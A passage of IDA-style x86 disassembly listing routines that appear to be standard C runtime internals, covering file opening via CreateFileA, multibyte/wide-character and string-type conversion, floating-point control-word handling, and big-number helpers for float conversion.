[ecx+0Ch], 8 mov dword ptr [ecx+18h], 1000h jmp short loc_423A29 ; --------------------------------------------------------------------------- loc_423A18: ; CODE XREF: sub_4239EF+1Aj or dword ptr [ecx+0Ch], 4 lea eax, [ecx+14h] mov [ecx+8], eax mov dword ptr [ecx+18h], 2 loc_423A29: ; CODE XREF: sub_4239EF+27j mov eax, [ecx+8] and dword ptr [ecx+4], 0 mov [ecx], eax retn sub_4239EF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_423A33 proc near ; CODE XREF: sub_41F32D+13Fp var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 1Ch mov ecx, [ebp+arg_4] push ebx xor ebx, ebx push esi test cl, 80h push edi mov [ebp+var_1C], 0Ch mov [ebp+var_18], ebx jz short loc_423A59 mov [ebp+var_14], ebx mov [ebp+var_1], 10h jmp short loc_423A64 ; --------------------------------------------------------------------------- loc_423A59: ; CODE XREF: sub_423A33+1Bj and [ebp+var_1], 0 mov [ebp+var_14], 1 loc_423A64: ; CODE XREF: sub_423A33+24j mov eax, 8000h test ecx, eax jnz short loc_423A7E test ch, 40h jnz short loc_423A7A cmp ds:dword_4DBC50, eax jz short loc_423A7E loc_423A7A: ; CODE XREF: sub_423A33+3Dj or [ebp+var_1], 80h loc_423A7E: ; CODE XREF: sub_423A33+38j ; sub_423A33+45j push 3 mov eax, ecx pop esi and eax, esi sub eax, ebx jz short loc_423AB6 dec eax jz short loc_423AAD dec eax jz short loc_423AA4 loc_423A8F: ; CODE XREF: sub_423A33+9Fj ; sub_423A33+E8j ... mov ds:dword_4DB958, 16h mov ds:dword_4DB95C, ebx jmp loc_423CC9 ; --------------------------------------------------------------------------- loc_423AA4: ; CODE XREF: sub_423A33+5Aj mov [ebp+var_C], 0C0000000h jmp short loc_423ABD ; --------------------------------------------------------------------------- loc_423AAD: ; CODE XREF: sub_423A33+57j mov [ebp+var_C], 40000000h jmp short loc_423ABD ; --------------------------------------------------------------------------- loc_423AB6: ; CODE XREF: sub_423A33+54j mov [ebp+var_C], 80000000h loc_423ABD: ; CODE XREF: sub_423A33+78j ; sub_423A33+81j mov eax, [ebp+arg_8] cmp eax, 10h jz short loc_423AEB cmp eax, 20h jz short loc_423AE2 cmp eax, 30h jz short loc_423AD9 cmp eax, 40h jnz short loc_423A8F mov [ebp+var_10], esi jmp short loc_423AEE ; --------------------------------------------------------------------------- loc_423AD9: ; CODE XREF: sub_423A33+9Aj mov [ebp+var_10], 2 jmp short loc_423AEE ; --------------------------------------------------------------------------- loc_423AE2: ; CODE XREF: sub_423A33+95j mov [ebp+var_10], 1 jmp short loc_423AEE ; --------------------------------------------------------------------------- loc_423AEB: ; CODE XREF: sub_423A33+90j mov [ebp+var_10], ebx loc_423AEE: ; CODE XREF: sub_423A33+A4j ; sub_423A33+ADj ... mov edx, 700h mov eax, 400h and ecx, edx mov edi, 100h cmp ecx, eax jg short loc_423B38 jz short loc_423B33 cmp ecx, ebx jz short loc_423B33 cmp ecx, edi jz short loc_423B2A cmp ecx, 200h jz short loc_423B51 cmp ecx, 300h jnz loc_423A8F mov [ebp+var_8], 2 jmp short loc_423B61 ; --------------------------------------------------------------------------- loc_423B2A: ; CODE XREF: sub_423A33+D8j mov [ebp+var_8], 4 jmp short loc_423B61 ; --------------------------------------------------------------------------- loc_423B33: ; CODE XREF: sub_423A33+D0j ; sub_423A33+D4j mov [ebp+var_8], esi jmp short loc_423B61 ; --------------------------------------------------------------------------- loc_423B38: ; CODE XREF: sub_423A33+CEj cmp ecx, 500h jz short loc_423B5A cmp ecx, 600h jz short loc_423B51 cmp ecx, edx jz short loc_423B5A jmp loc_423A8F ; --------------------------------------------------------------------------- loc_423B51: ; CODE XREF: sub_423A33+E0j ; sub_423A33+113j mov [ebp+var_8], 5 jmp short loc_423B61 ; --------------------------------------------------------------------------- loc_423B5A: ; CODE XREF: sub_423A33+10Bj ; sub_423A33+117j mov [ebp+var_8], 1 loc_423B61: ; CODE XREF: sub_423A33+F5j ; sub_423A33+FEj ... mov eax, [ebp+arg_4] mov esi, 80h test eax, edi jz short loc_423B80 mov ecx, ds:dword_4DB960 not ecx and ecx, [ebp+arg_C] test cl, 80h jnz short loc_423B80 push 1 pop esi loc_423B80: ; CODE XREF: sub_423A33+138j ; sub_423A33+148j test al, 40h jz short loc_423B8E or esi, 4000000h or byte ptr [ebp+var_C+2], 1 loc_423B8E: ; CODE XREF: sub_423A33+14Fj test ah, 10h jz short loc_423B95 or esi, edi loc_423B95: ; CODE XREF: sub_423A33+15Ej test al, 20h jz short loc_423BA1 or esi, 8000000h jmp short loc_423BAB ; --------------------------------------------------------------------------- loc_423BA1: ; CODE XREF: sub_423A33+164j test al, 10h jz short loc_423BAB or esi, 10000000h loc_423BAB: ; CODE XREF: sub_423A33+16Cj ; sub_423A33+170j call sub_42371C mov ebx, eax or edi, 0FFFFFFFFh cmp ebx, edi jnz short loc_423BCC and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 18h jmp short loc_423C0A ; --------------------------------------------------------------------------- loc_423BCC: ; CODE XREF: sub_423A33+184j push 0 push esi push [ebp+var_8] lea eax, [ebp+var_1C] push eax push [ebp+var_10] push [ebp+var_C] push [ebp+arg_0] call dword_4270EC ; CreateFileA mov esi, eax cmp esi, edi jz short loc_423BFD push esi call dword_427030 ; GetFileType test eax, eax jnz short loc_423C11 push esi call dword_427068 ; CloseHandle loc_423BFD: ; CODE XREF: sub_423A33+1B6j call dword_42708C ; RtlGetLastWin32Error push eax call sub_4203DF pop ecx loc_423C0A: ; CODE XREF: sub_423A33+197j mov eax, edi jmp loc_423CE7 ; --------------------------------------------------------------------------- loc_423C11: ; CODE XREF: sub_423A33+1C1j cmp eax, 2 jnz short loc_423C1C or [ebp+var_1], 40h jmp short loc_423C25 ; --------------------------------------------------------------------------- loc_423C1C: ; CODE XREF: sub_423A33+1E1j cmp eax, 3 jnz short loc_423C25 or [ebp+var_1], 8 loc_423C25: ; CODE XREF: sub_423A33+1E7j ; sub_423A33+1ECj push esi push ebx call sub_4237B1 pop ecx mov al, [ebp+var_1] pop ecx mov esi, ebx mov ecx, ebx or al, 1 sar ecx, 5 and esi, 1Fh mov byte ptr [ebp+arg_0+3], al lea edi, ds:4DCCA0h[ecx*4] shl esi, 3 mov ecx, [edi] and byte ptr [ebp+arg_0+3], 48h mov [ecx+esi+4], al jnz short loc_423CCE test al, 80h jz short loc_423CCE test byte ptr [ebp+arg_4], 2 jz short loc_423CCE push 2 push 0FFFFFFFFh push ebx call sub_42272B add esp, 0Ch cmp eax, 0FFFFFFFFh mov [ebp+var_10], eax jnz short loc_423C83 cmp ds:dword_4DB95C, 83h jz short loc_423CCE jmp short loc_423CC2 ; --------------------------------------------------------------------------- loc_423C83: ; CODE XREF: sub_423A33+240j and byte ptr [ebp+arg_8+3], 0 lea eax, [ebp+arg_8+3] push 1 push eax push ebx call sub_41F11C add esp, 0Ch test eax, eax jnz short loc_423CB0 cmp byte ptr [ebp+arg_8+3], 1Ah jnz short loc_423CB0 push [ebp+var_10] push ebx call sub_424F0A pop ecx cmp eax, 0FFFFFFFFh pop ecx jz short loc_423CC2 loc_423CB0: ; CODE XREF: sub_423A33+265j ; sub_423A33+26Bj push 0 push 0 push ebx call sub_42272B add esp, 0Ch cmp eax, 0FFFFFFFFh jnz short loc_423CCE loc_423CC2: ; CODE XREF: sub_423A33+24Ej ; sub_423A33+27Bj push ebx call sub_41DA72 pop ecx loc_423CC9: ; CODE XREF: sub_423A33+6Cj or eax, 0FFFFFFFFh jmp short loc_423CE7 ; --------------------------------------------------------------------------- loc_423CCE: ; CODE XREF: sub_423A33+221j ; sub_423A33+225j ... cmp byte ptr [ebp+arg_0+3], 0 jnz short loc_423CE5 test byte ptr [ebp+arg_4], 8 jz short loc_423CE5 mov eax, [edi] or byte ptr [eax+esi+4], 20h lea eax, [eax+esi+4] loc_423CE5: ; CODE XREF: sub_423A33+29Fj ; sub_423A33+2A5j mov eax, ebx loc_423CE7: ; CODE XREF: sub_423A33+1D9j ; sub_423A33+299j pop edi pop esi pop ebx leave retn sub_423A33 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_423CEC proc near ; CODE XREF: sub_41F515+5Ep ; sub_4200E8+9Ap var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = byte ptr -1Ch var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427C48 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 18h push ebx push esi push edi mov [ebp+var_18], esp mov eax, ds:dword_4DBB48 xor ebx, ebx cmp eax, ebx jnz short loc_423D5B lea eax, [ebp+var_1C] push eax push 1 pop esi push esi push offset dword_427938 push esi call dword_427020 ; GetStringTypeW test eax, eax jz short loc_423D39 mov eax, esi jmp short loc_423D56 ; --------------------------------------------------------------------------- loc_423D39: ; CODE XREF: sub_423CEC+47j lea eax, [ebp+var_1C] push eax push esi push offset dword_4CB50C push esi push ebx call dword_427024 ; GetStringTypeA test eax, eax jz loc_423E21 push 2 pop eax loc_423D56: ; CODE XREF: sub_423CEC+4Bj mov ds:dword_4DBB48, eax loc_423D5B: ; CODE XREF: sub_423CEC+2Fj cmp eax, 2 jnz short loc_423D84 mov eax, [ebp+arg_14] cmp eax, ebx jnz short loc_423D6C mov eax, ds:dword_4DBA14 loc_423D6C: ; CODE XREF: sub_423CEC+79j push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] push eax call dword_427024 ; GetStringTypeA jmp loc_423E23 ; --------------------------------------------------------------------------- loc_423D84: ; CODE XREF: sub_423CEC+72j cmp eax, 1 jnz loc_423E21 cmp [ebp+arg_10], ebx jnz short loc_423D9A mov eax, ds:dword_4DBA24 mov [ebp+arg_10], eax loc_423D9A: ; CODE XREF: sub_423CEC+A4j push ebx push ebx push [ebp+arg_8] push [ebp+arg_4] mov eax, [ebp+arg_18] neg eax sbb eax, eax and eax, 8 inc eax push eax push [ebp+arg_10] call dword_427180 ; MultiByteToWideChar mov [ebp+var_20], eax cmp eax, ebx jz short loc_423E21 mov [ebp+var_4], ebx lea edi, [eax+eax] mov eax, edi add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov esi, esp mov [ebp+var_24], esi push edi push ebx push esi call sub_41B590 add esp, 0Ch jmp short loc_423DF0 ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor ebx, ebx xor esi, esi loc_423DF0: ; CODE XREF: sub_423CEC+F7j or [ebp+var_4], 0FFFFFFFFh cmp esi, ebx jz short loc_423E21 push [ebp+var_20] push esi push [ebp+arg_8] push [ebp+arg_4] push 1 push [ebp+arg_10] call dword_427180 ; MultiByteToWideChar cmp eax, ebx jz short loc_423E21 push [ebp+arg_C] push eax push esi push [ebp+arg_0] call dword_427020 ; GetStringTypeW jmp short loc_423E23 ; --------------------------------------------------------------------------- loc_423E21: ; CODE XREF: sub_423CEC+61j ; sub_423CEC+9Bj ... xor eax, eax loc_423E23: ; CODE XREF: sub_423CEC+93j ; sub_423CEC+133j lea esp, [ebp-34h] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_423CEC endp ; =============== S U B R O U T I N E ======================================= sub_423E35 proc near ; CODE XREF: sub_41F58A+61p ; sub_420446+8p arg_0 = dword ptr 4 mov eax, [esp+arg_0] cmp eax, ds:dword_4DCDA0 jb short loc_423E44 xor eax, eax retn ; --------------------------------------------------------------------------- loc_423E44: ; CODE XREF: sub_423E35+Aj mov ecx, eax and eax, 1Fh sar ecx, 5 mov ecx, ds:dword_4DCCA0[ecx*4] mov al, [ecx+eax*8+4] and eax, 40h retn sub_423E35 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_423E5B proc near ; CODE XREF: sub_41F69F+2D4p ; sub_41F69F+6B3p arg_0 = dword ptr 8 arg_4 = word ptr 0Ch push ebp mov ebp, esp mov eax, [ebp+arg_0] test eax, eax jnz short loc_423E67 pop ebp retn ; --------------------------------------------------------------------------- loc_423E67: ; CODE XREF: sub_423E5B+8j cmp ds:dword_4DBA14, 0 jnz short loc_423E82 mov cx, [ebp+arg_4] cmp cx, 0FFh ja short loc_423EB4 push 1 mov [eax], cl pop eax pop ebp retn ; --------------------------------------------------------------------------- loc_423E82: ; CODE XREF: sub_423E5B+13j lea ecx, [ebp+arg_0] and [ebp+arg_0], 0 push ecx push 0 push dword_43CBE4 push eax lea eax, [ebp+arg_4] push 1 push eax push 220h push ds:dword_4DBA24 call dword_42717C ; WideCharToMultiByte test eax, eax jz short loc_423EB4 cmp [ebp+arg_0], 0 jz short loc_423EC1 loc_423EB4: ; CODE XREF: sub_423E5B+1Ej ; sub_423E5B+51j mov ds:dword_4DB958, 2Ah or eax, 0FFFFFFFFh loc_423EC1: ; CODE XREF: sub_423E5B+57j pop ebp retn sub_423E5B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_423EC3 proc near ; CODE XREF: sub_420510+6A3p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ebx push esi mov esi, [ebp+arg_4] xor ebx, ebx cmp esi, ebx jz short loc_423EE6 cmp [ebp+arg_8], ebx jz short loc_423EE6 mov al, [esi] cmp al, bl jnz short loc_423EEC mov eax, [ebp+arg_0] cmp eax, ebx jz short loc_423EE6 mov [eax], bx loc_423EE6: ; CODE XREF: sub_423EC3+Cj ; sub_423EC3+11j ... xor eax, eax loc_423EE8: ; CODE XREF: sub_423EC3+42j ; sub_423EC3+86j ... pop esi pop ebx pop ebp retn ; --------------------------------------------------------------------------- loc_423EEC: ; CODE XREF: sub_423EC3+17j cmp ds:dword_4DBA14, ebx jnz short loc_423F07 mov ecx, [ebp+arg_0] cmp ecx, ebx jz short loc_423F02 movzx ax, al mov [ecx], ax loc_423F02: ; CODE XREF: sub_423EC3+36j ; sub_423EC3+C0j push 1 pop eax jmp short loc_423EE8 ; --------------------------------------------------------------------------- loc_423F07: ; CODE XREF: sub_423EC3+2Fj mov ecx, off_43C9D8 movzx eax, al test byte ptr [ecx+eax*2+1], 80h jz short loc_423F64 mov eax, dword_43CBE4 cmp eax, 1 jle short loc_423F4B cmp [ebp+arg_8], eax jl short loc_423F55 xor ecx, ecx cmp [ebp+arg_0], ebx setnz cl push ecx push [ebp+arg_0] push eax push esi push 9 push ds:dword_4DBA24 call dword_427180 ; MultiByteToWideChar test eax, eax mov eax, dword_43CBE4 jnz short loc_423EE8 loc_423F4B: ; CODE XREF: sub_423EC3+5Cj cmp [ebp+arg_8], eax jb short loc_423F55 cmp [esi+1], bl jnz short loc_423EE8 loc_423F55: ; CODE XREF: sub_423EC3+61j ; sub_423EC3+8Bj ... mov ds:dword_4DB958, 2Ah or eax, 0FFFFFFFFh jmp short loc_423EE8 ; --------------------------------------------------------------------------- loc_423F64: ; CODE XREF: sub_423EC3+52j xor eax, eax cmp [ebp+arg_0], ebx setnz al push eax push [ebp+arg_0] push 1 push esi push 9 push ds:dword_4DBA24 call dword_427180 ; MultiByteToWideChar test eax, eax jnz loc_423F02 jmp short loc_423F55 sub_423EC3 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_423F90 proc near ; CODE XREF: sub_420510+797p ; sub_420510+7E7p cmp cl, 40h jnb short loc_423FAA cmp cl, 20h jnb short loc_423FA0 shld edx, eax, cl shl eax, cl retn ; --------------------------------------------------------------------------- loc_423FA0: ; CODE XREF: sub_423F90+8j mov edx, eax xor eax, eax and cl, 1Fh shl edx, cl retn ; --------------------------------------------------------------------------- loc_423FAA: ; CODE XREF: sub_423F90+3j xor eax, eax xor edx, edx retn sub_423F90 endp ; =============== S U B R O U T I N E ======================================= sub_423FAF proc near ; CODE XREF: sub_420F86+Fp arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx mov ebx, [esp+4+arg_0] cmp ebx, 0FFFFFFFFh push esi jz short loc_423FFB mov esi, [esp+8+arg_4] mov eax, [esi+0Ch] test al, 1 jnz short loc_423FCD test al, 80h jz short loc_423FFB test al, 2 jnz short loc_423FFB loc_423FCD: ; CODE XREF: sub_423FAF+14j cmp dword ptr [esi+8], 0 jnz short loc_423FDA push esi call sub_4239EF pop ecx loc_423FDA: ; CODE XREF: sub_423FAF+22j mov eax, [esi] cmp eax, [esi+8] jnz short loc_423FEA cmp dword ptr [esi+4], 0 jnz short loc_423FFB inc eax mov [esi], eax loc_423FEA: ; CODE XREF: sub_423FAF+30j test byte ptr [esi+0Ch], 40h jz short loc_424001 dec dword ptr [esi] mov eax, [esi] cmp [eax], bl jz short loc_424007 inc eax mov [esi], eax loc_423FFB: ; CODE XREF: sub_423FAF+9j ; sub_423FAF+18j ... or eax, 0FFFFFFFFh loc_423FFE: ; CODE XREF: sub_423FAF+6Cj pop esi pop ebx retn ; --------------------------------------------------------------------------- loc_424001: ; CODE XREF: sub_423FAF+3Fj dec dword ptr [esi] mov eax, [esi] mov [eax], bl loc_424007: ; CODE XREF: sub_423FAF+47j mov eax, [esi+0Ch] inc dword ptr [esi+4] and al, 0EFh or al, 1 mov [esi+0Ch], eax mov eax, ebx and eax, 0FFh jmp short loc_423FFE sub_423FAF endp ; =============== S U B R O U T I N E ======================================= sub_42401D proc near ; CODE XREF: sub_421576+52p xor eax, eax retn sub_42401D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424020 proc near ; CODE XREF: sub_424055+Ep var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push esi fstcw word ptr [ebp+var_4] push [ebp+var_4] call sub_42406B mov esi, eax mov eax, [ebp+arg_4] not eax and esi, eax mov eax, [ebp+arg_0] and eax, [ebp+arg_4] or esi, eax push esi call sub_4240FD pop ecx mov [ebp+arg_4], eax pop ecx fldcw word ptr [ebp+arg_4] mov eax, esi pop esi leave retn sub_424020 endp ; =============== S U B R O U T I N E ======================================= sub_424055 proc near ; CODE XREF: sub_421862+Ap arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_4] and eax, 0FFF7FFFFh push eax push [esp+4+arg_0] call sub_424020 pop ecx pop ecx retn sub_424055 endp ; =============== S U B R O U T I N E ======================================= sub_42406B proc near ; CODE XREF: sub_424020+Cp arg_0 = dword ptr 4 push ebx mov ebx, [esp+4+arg_0] xor eax, eax push ebp test bl, 1 push edi jz short loc_42407C push 10h pop eax loc_42407C: ; CODE XREF: sub_42406B+Cj test bl, 4 jz short loc_424083 or al, 8 loc_424083: ; CODE XREF: sub_42406B+14j test bl, 8 jz short loc_42408A or al, 4 loc_42408A: ; CODE XREF: sub_42406B+1Bj test bl, 10h jz short loc_424091 or al, 2 loc_424091: ; CODE XREF: sub_42406B+22j test bl, 20h jz short loc_424098 or al, 1 loc_424098: ; CODE XREF: sub_42406B+29j test bl, 2 jz short loc_4240A2 or eax, 80000h loc_4240A2: ; CODE XREF: sub_42406B+30j movzx ecx, bx push esi mov edx, ecx mov esi, 0C00h mov edi, 300h and edx, esi mov ebp, 200h jz short loc_4240DA cmp edx, 400h jz short loc_4240D7 cmp edx, 800h jz short loc_4240D3 cmp edx, esi jnz short loc_4240DA or eax, edi jmp short loc_4240DA ; --------------------------------------------------------------------------- loc_4240D3: ; CODE XREF: sub_42406B+5Ej or eax, ebp jmp short loc_4240DA ; --------------------------------------------------------------------------- loc_4240D7: ; CODE XREF: sub_42406B+56j or ah, 1 loc_4240DA: ; CODE XREF: sub_42406B+4Ej ; sub_42406B+62j ... and ecx, edi pop esi jz short loc_4240EA cmp ecx, ebp jnz short loc_4240EF or eax, 10000h jmp short loc_4240EF ; --------------------------------------------------------------------------- loc_4240EA: ; CODE XREF: sub_42406B+72j or eax, 20000h loc_4240EF: ; CODE XREF: sub_42406B+76j ; sub_42406B+7Dj pop edi pop ebp test bh, 10h pop ebx jz short locret_4240FC or eax, 40000h locret_4240FC: ; CODE XREF: sub_42406B+8Aj retn sub_42406B endp ; =============== S U B R O U T I N E ======================================= sub_4240FD proc near ; CODE XREF: sub_424020+23p arg_0 = dword ptr 4 push ebx mov ebx, [esp+4+arg_0] xor eax, eax push esi test bl, 10h jz short loc_42410D push 1 pop eax loc_42410D: ; CODE XREF: sub_4240FD+Bj test bl, 8 jz short loc_424114 or al, 4 loc_424114: ; CODE XREF: sub_4240FD+13j test bl, 4 jz short loc_42411B or al, 8 loc_42411B: ; CODE XREF: sub_4240FD+1Aj test bl, 2 jz short loc_424122 or al, 10h loc_424122: ; CODE XREF: sub_4240FD+21j test bl, 1 jz short loc_424129 or al, 20h loc_424129: ; CODE XREF: sub_4240FD+28j test ebx, 80000h jz short loc_424133 or al, 2 loc_424133: ; CODE XREF: sub_4240FD+32j mov ecx, ebx mov edx, 300h and ecx, edx mov esi, 200h jz short loc_424160 cmp ecx, 100h jz short loc_42415D cmp ecx, esi jz short loc_424158 cmp ecx, edx jnz short loc_424160 or ah, 0Ch jmp short loc_424160 ; --------------------------------------------------------------------------- loc_424158: ; CODE XREF: sub_4240FD+50j or ah, 8 jmp short loc_424160 ; --------------------------------------------------------------------------- loc_42415D: ; CODE XREF: sub_4240FD+4Cj or ah, 4 loc_424160: ; CODE XREF: sub_4240FD+44j ; sub_4240FD+54j ... mov ecx, ebx and ecx, 30000h jz short loc_424176 cmp ecx, 10000h jnz short loc_424178 or eax, esi jmp short loc_424178 ; --------------------------------------------------------------------------- loc_424176: ; CODE XREF: sub_4240FD+6Bj or eax, edx loc_424178: ; CODE XREF: sub_4240FD+73j ; sub_4240FD+77j pop esi test ebx, 40000h pop ebx jz short locret_424185 or ah, 10h locret_424185: ; CODE XREF: sub_4240FD+83j retn sub_4240FD endp ; =============== S U B R O U T I N E ======================================= sub_424186 proc near ; CODE XREF: sub_424225+48p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_4] push esi push 20h cdq pop ecx idiv ecx push 1Fh mov esi, eax mov eax, [esp+8+arg_4] cdq idiv ecx pop ecx mov eax, [esp+4+arg_0] sub ecx, edx or edx, 0FFFFFFFFh shl edx, cl not edx test [eax+esi*4], edx jnz short loc_4241CB inc esi cmp esi, 3 jge short loc_4241C6 lea eax, [eax+esi*4] loc_4241B8: ; CODE XREF: sub_424186+3Ej cmp dword ptr [eax], 0 jnz short loc_4241CB inc esi add eax, 4 cmp esi, 3 jl short loc_4241B8 loc_4241C6: ; CODE XREF: sub_424186+2Dj push 1 pop eax pop esi retn ; --------------------------------------------------------------------------- loc_4241CB: ; CODE XREF: sub_424186+27j ; sub_424186+35j xor eax, eax pop esi retn sub_424186 endp ; =============== S U B R O U T I N E ======================================= sub_4241CF proc near ; CODE XREF: sub_424225+57p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_4] push ebx push esi push edi push 20h mov ebx, [esp+10h+arg_0] cdq pop ecx idiv ecx mov esi, eax mov eax, [esp+0Ch+arg_4] cdq idiv ecx lea edi, [ebx+esi*4] push edi push 1Fh pop ecx push 1 pop eax sub ecx, edx shl eax, cl push eax push dword ptr [edi] call sub_425050 add esp, 0Ch dec esi js short loc_424221 lea edi, [ebx+esi*4] loc_424208: ; CODE XREF: sub_4241CF+50j test eax, eax jz short loc_424221 push edi push 1 push dword ptr [edi] call sub_425050 add esp, 0Ch dec esi sub edi, 4 test esi, esi jge short loc_424208 loc_424221: ; CODE XREF: sub_4241CF+34j ; sub_4241CF+3Bj pop edi pop esi pop ebx retn sub_4241CF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424225 proc near ; CODE XREF: sub_424380+81p ; sub_424380+CCp var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ecx mov eax, [ebp+arg_4] push ebx push esi push edi lea edi, [eax-1] push 20h pop ecx and [ebp+var_4], 0 lea ebx, [edi+1] push 20h mov eax, ebx pop esi cdq idiv ecx push 1Fh mov ecx, eax mov eax, ebx cdq idiv esi mov eax, [ebp+arg_0] pop esi push 1 mov [ebp+var_8], ecx lea eax, [eax+ecx*4] mov [ebp+arg_4], eax sub esi, edx pop edx mov ecx, esi shl edx, cl test [eax], edx jz short loc_424289 inc ebx push ebx push [ebp+arg_0] call sub_424186 pop ecx test eax, eax pop ecx jnz short loc_424286 push edi push [ebp+arg_0] call sub_4241CF pop ecx mov [ebp+var_4], eax pop ecx loc_424286: ; CODE XREF: sub_424225+51j mov eax, [ebp+arg_4] loc_424289: ; CODE XREF: sub_424225+41j or edx, 0FFFFFFFFh mov ecx, esi shl edx, cl push 3 pop ecx and [eax], edx mov eax, [ebp+var_8] inc eax cmp eax, ecx jge short loc_4242A9 mov edx, [ebp+arg_0] sub ecx, eax lea edi, [edx+eax*4] xor eax, eax rep stosd loc_4242A9: ; CODE XREF: sub_424225+76j mov eax, [ebp+var_4] pop edi pop esi pop ebx leave retn sub_424225 endp ; =============== S U B R O U T I N E ======================================= sub_4242B1 proc near ; CODE XREF: sub_424380+75p ; sub_424380+B6p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_4] mov ecx, [esp+arg_0] push esi push 3 sub ecx, eax pop edx loc_4242BF: ; CODE XREF: sub_4242B1+17j mov esi, [eax] mov [ecx+eax], esi add eax, 4 dec edx jnz short loc_4242BF pop esi retn sub_4242B1 endp ; =============== S U B R O U T I N E ======================================= sub_4242CC proc near ; CODE XREF: sub_424380+5Fp ; sub_424380+9Ep ... arg_0 = dword ptr 4 push edi mov edi, [esp+4+arg_0] xor eax, eax stosd stosd stosd pop edi retn sub_4242CC endp ; =============== S U B R O U T I N E ======================================= sub_4242D8 proc near ; CODE XREF: sub_424380+4Dp arg_0 = dword ptr 4 mov eax, [esp+arg_0] xor ecx, ecx loc_4242DE: ; CODE XREF: sub_4242D8+12j cmp dword ptr [eax], 0 jnz short loc_4242F0 inc ecx add eax, 4 cmp ecx, 3 jl short loc_4242DE push 1 pop eax retn ; --------------------------------------------------------------------------- loc_4242F0: ; CODE XREF: sub_4242D8+9j xor eax, eax retn sub_4242D8 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4242F3 proc near ; CODE XREF: sub_424380+C0p ; sub_424380+DAp ... var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0Ch mov eax, [ebp+arg_4] push ebx push esi push edi push 20h mov edi, [ebp+arg_0] pop ebx or esi, 0FFFFFFFFh cdq mov ecx, ebx mov [ebp+var_4], 3 idiv ecx mov [ebp+var_C], eax mov eax, [ebp+arg_4] cdq idiv ecx and [ebp+arg_4], 0 mov ecx, edx shl esi, cl sub ebx, edx not esi loc_424329: ; CODE XREF: sub_4242F3+58j mov eax, [edi] mov ecx, eax and ecx, esi mov [ebp+var_8], ecx mov ecx, edx shr eax, cl or eax, [ebp+arg_4] mov [edi], eax mov eax, [ebp+var_8] mov ecx, ebx add edi, 4 shl eax, cl dec [ebp+var_4] mov [ebp+arg_4], eax jnz short loc_424329 mov edi, [ebp+var_C] push 2 pop ebx mov esi, edi push 8 pop ecx shl esi, 2 loc_42435B: ; CODE XREF: sub_4242F3+86j cmp ebx, edi jl short loc_42436E mov edx, [ebp+arg_0] mov eax, ecx sub eax, esi mov eax, [eax+edx] mov [ecx+edx], eax jmp short loc_424375 ; --------------------------------------------------------------------------- loc_42436E: ; CODE XREF: sub_4242F3+6Aj mov eax, [ebp+arg_0] and dword ptr [ecx+eax], 0 loc_424375: ; CODE XREF: sub_4242F3+79j dec ebx sub ecx, 4 jns short loc_42435B pop edi pop esi pop ebx leave retn sub_4242F3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424380 proc near ; CODE XREF: sub_4244EC+Dp ; sub_424502+Dp var_18 = byte ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 18h mov eax, [ebp+arg_0] push ebx push esi push edi movzx ecx, word ptr [eax+0Ah] mov ebx, ecx and ecx, 8000h mov [ebp+arg_0], ecx mov ecx, [eax+6] mov [ebp+var_C], ecx mov ecx, [eax+2] movzx eax, word ptr [eax] mov edi, [ebp+arg_8] and ebx, 7FFFh sub ebx, 3FFFh mov [ebp+var_8], ecx shl eax, 10h cmp ebx, 0FFFFC001h mov [ebp+var_4], eax jnz short loc_4243ED lea eax, [ebp+var_C] xor esi, esi push eax call sub_4242D8 test eax, eax pop ecx jnz loc_4244AC lea eax, [ebp+var_C] push eax call sub_4242CC pop ecx loc_4243E5: ; CODE XREF: sub_424380+E4j push 2 loc_4243E7: ; CODE XREF: sub_424380+110j pop eax jmp loc_4244AE ; --------------------------------------------------------------------------- loc_4243ED: ; CODE XREF: sub_424380+45j lea eax, [ebp+var_C] push eax lea eax, [ebp+var_18] push eax call sub_4242B1 